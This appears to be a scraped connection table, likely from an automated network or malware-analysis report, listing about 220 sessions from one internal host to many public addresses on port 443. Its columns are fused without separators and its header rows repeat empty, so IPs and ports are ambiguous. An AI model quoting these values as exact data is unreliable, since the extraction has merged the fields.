                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18394192.168.2.2343866113.250.90.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18395192.168.2.2340586128.37.2.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18396192.168.2.2359466157.27.147.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18397192.168.2.234274280.119.242.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18398192.168.2.2355774131.79.90.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18399192.168.2.235062079.216.40.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18400192.168.2.2342692199.75.192.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18401192.168.2.2360058160.111.251.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18402192.168.2.2360440113.96.242.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18403192.168.2.2355848129.92.18.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18404192.168.2.2359110159.140.55.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18405192.168.2.233895266.243.123.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18406192.168.2.233309012.189.239.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18407192.168.2.2345294174.109.185.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18408192.168.2.2358212109.58.179.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18409192.168.2.234256097.18.244.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18410192.168.2.2338332186.75.16.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18411192.168.2.2338450114.198.182.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18412192.168.2.23351124.191.238.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18413192.168.2.2333468114.25.94.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18414192.168.2.2335504162.26.47.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18415192.168.2.2360832188.75.219.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18416192.168.2.2338202150.29.109.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18417192.168.2.2342390113.185.201.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18418192.168.2.2339602159.235.144.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18419192.168.2.233464671.186.240.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18420192.168.2.234357462.126.17.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18421192.168.2.235829218.233.159.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18422192.168.2.2359458195.126.29.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18423192.168.2.235689639.32.84.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18424192.168.2.2332892223.179.252.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18425192.168.2.2349984206.148.112.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18426192.168.2.233451240.55.75.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18427192.168.2.234425294.0.237.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18428192.168.2.2349794209.226.184.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18429192.168.2.2359898216.216.23.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18430192.168.2.2342026195.201.21.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18431192.168.2.234359264.231.94.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18432192.168.2.2336000204.119.217.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18433192.168.2.233847648.177.32.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18434192.168.2.2344820106.146.114.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18435192.168.2.234583827.145.196.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18436192.168.2.2352234183.193.131.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18437192.168.2.2341538158.249.86.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18438192.168.2.2337188150.34.122.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18439192.168.2.2337386220.202.66.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18440192.168.2.2333020167.253.136.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18441192.168.2.2337518185.34.7.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18442192.168.2.235150286.0.97.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18443192.168.2.2354288205.206.92.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18444192.168.2.234813848.155.99.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18445192.168.2.23474242.109.4.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18446192.168.2.2334976111.217.3.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18447192.168.2.2345864141.235.81.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18448192.168.2.2345680138.172.35.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18449192.168.2.234628837.136.14.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18450192.168.2.235680240.29.147.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18451192.168.2.235614896.196.145.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18452192.168.2.235657061.78.129.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18453192.168.2.233480477.138.134.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18454192.168.2.2355356195.174.172.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18455192.168.2.235054219.211.234.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18456192.168.2.2343174108.239.46.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18457192.168.2.2336612222.30.57.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18458192.168.2.2348730132.73.94.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18459192.168.2.2360812217.101.48.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18460192.168.2.2342464194.149.148.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18461192.168.2.2345004106.79.109.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18462192.168.2.2347816130.202.177.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18463192.168.2.235010699.224.181.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18464192.168.2.2341604130.183.39.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18465192.168.2.2353226171.13.117.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18466192.168.2.233311891.6.224.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18467192.168.2.2349818207.41.31.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18468192.168.2.235346854.170.243.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18469192.168.2.234795880.195.244.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18470192.168.2.235175842.58.81.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18471192.168.2.2334834160.249.222.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18472192.168.2.2336434222.181.17.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18473192.168.2.2338540165.46.224.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18474192.168.2.2335954203.217.25.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18475192.168.2.2344400147.66.253.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18476192.168.2.235918883.25.87.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18477192.168.2.234373640.124.202.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18478192.168.2.235397680.113.86.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18479192.168.2.2348260194.170.177.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18480192.168.2.2336012223.182.54.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18481192.168.2.235042864.110.110.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18482192.168.2.2339494180.19.180.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18483192.168.2.234107071.28.149.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18484192.168.2.2337646115.87.97.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18485192.168.2.2351768146.88.91.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18486192.168.2.2340554195.86.1.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18487192.168.2.2336650191.129.219.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18488192.168.2.2354004171.14.96.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18489192.168.2.235288049.218.66.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18490192.168.2.234736262.135.166.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18491192.168.2.2336294122.80.174.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18492192.168.2.234901635.101.10.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18493192.168.2.2351554158.122.45.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18494192.168.2.2333912111.182.170.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18495192.168.2.2348870173.81.191.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18496192.168.2.23463442.34.221.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18497192.168.2.235074089.36.61.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18498192.168.2.233791898.171.132.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18499192.168.2.2360910128.244.159.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18500192.168.2.234557219.62.132.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18501192.168.2.2339842218.150.207.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18502192.168.2.2350662194.13.4.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18503192.168.2.2354552131.28.108.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18504192.168.2.234246699.131.122.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18505192.168.2.2354420197.202.217.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18506192.168.2.233967483.175.185.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18507192.168.2.2343184175.185.99.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18508192.168.2.2356076222.92.155.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18509192.168.2.235603085.112.43.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18510192.168.2.234691418.186.42.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18511192.168.2.234864070.52.113.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18512192.168.2.235658413.101.88.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18513192.168.2.2343314142.168.148.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18514192.168.2.235750846.51.247.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18515192.168.2.233474870.151.7.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18516192.168.2.2355790101.70.96.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18517192.168.2.234828262.2.33.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18518192.168.2.2336554134.39.28.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18519192.168.2.234225880.166.232.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18520192.168.2.235709286.147.168.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18521192.168.2.235493418.62.64.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18522192.168.2.235295453.141.132.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18523192.168.2.2360850107.243.132.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18524192.168.2.234612836.150.163.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18525192.168.2.2338058104.207.3.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18526192.168.2.234611625.52.70.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18527192.168.2.2353280101.156.215.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18528192.168.2.2355026152.232.64.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18529192.168.2.233578493.111.128.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18530192.168.2.2355072122.185.0.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18531192.168.2.2336780117.75.185.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18532192.168.2.234950090.18.229.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18533192.168.2.2345258197.179.60.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18534192.168.2.2349962128.148.66.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18535192.168.2.2351170206.22.78.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18536192.168.2.234930820.162.92.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18537192.168.2.2349250116.125.98.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18538192.168.2.234415864.34.141.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18539192.168.2.235340413.158.78.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18540192.168.2.235922842.213.221.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18541192.168.2.2352012148.61.186.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18542192.168.2.2354354111.148.249.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18543192.168.2.2347164223.137.62.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18544192.168.2.2340934115.116.120.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18545192.168.2.2340950109.157.75.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18546192.168.2.2360780131.155.164.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18547192.168.2.2344380159.88.150.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18548192.168.2.235791439.138.215.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18549192.168.2.2360826153.194.50.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18550192.168.2.235014066.208.8.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18551192.168.2.2338746115.7.124.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18552192.168.2.2333978128.12.42.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18553192.168.2.2360654180.38.157.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18554192.168.2.2356804105.37.165.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18555192.168.2.2343422191.213.174.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18556192.168.2.234636839.110.158.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18557192.168.2.2360822192.63.144.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18558192.168.2.235313492.247.229.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18559192.168.2.234713014.190.22.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18560192.168.2.2348854222.58.159.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18561192.168.2.2357376170.12.218.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18562192.168.2.234693624.69.134.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18563192.168.2.234543475.156.131.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18564192.168.2.235616697.25.231.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18565192.168.2.235415698.188.182.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18566192.168.2.2358366178.54.31.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18567192.168.2.2344530119.23.63.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18568192.168.2.2344252169.67.234.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18569192.168.2.234302897.42.198.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18570192.168.2.234083458.53.199.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18571192.168.2.233980084.35.196.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18572192.168.2.233630073.182.204.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18573192.168.2.235429296.84.247.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18574192.168.2.2349332181.56.21.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18575192.168.2.234681499.27.130.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18576192.168.2.2351178148.16.195.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18577192.168.2.2352314115.117.230.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18578192.168.2.234649877.139.70.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18579192.168.2.23529721.113.144.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18580192.168.2.236022893.12.182.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18581192.168.2.2344002120.129.232.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18582192.168.2.2335942200.39.199.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18583192.168.2.234201052.221.229.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18584192.168.2.2341328109.82.149.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18585192.168.2.2353676138.225.25.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18586192.168.2.2332776123.102.85.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18587192.168.2.233814670.130.107.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18588192.168.2.2359032138.119.106.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18589192.168.2.233849891.50.228.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18590192.168.2.235351427.209.210.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18591192.168.2.2346236131.153.16.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18592192.168.2.235719624.125.247.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18593192.168.2.2347300153.208.240.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18594192.168.2.234933279.196.2.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18595192.168.2.235089690.20.235.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18596192.168.2.2360772146.244.46.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18597192.168.2.2337522138.162.154.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18598192.168.2.2355958121.166.141.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18599192.168.2.2346836212.219.61.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18600192.168.2.2336254198.248.251.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18601192.168.2.236087859.75.99.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18602192.168.2.234927419.18.2.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18603192.168.2.234918687.68.160.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18604192.168.2.2360776157.14.44.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18605192.168.2.235706642.33.30.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18606192.168.2.235075077.231.255.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18607192.168.2.235234294.7.140.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18608192.168.2.2352968192.215.236.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18609192.168.2.2339356202.77.81.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18610192.168.2.233677654.214.225.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18611192.168.2.233592686.104.7.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18612192.168.2.2348244105.193.97.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18613192.168.2.233685825.93.151.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18614192.168.2.235724036.6.118.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18615192.168.2.235355289.39.233.214443
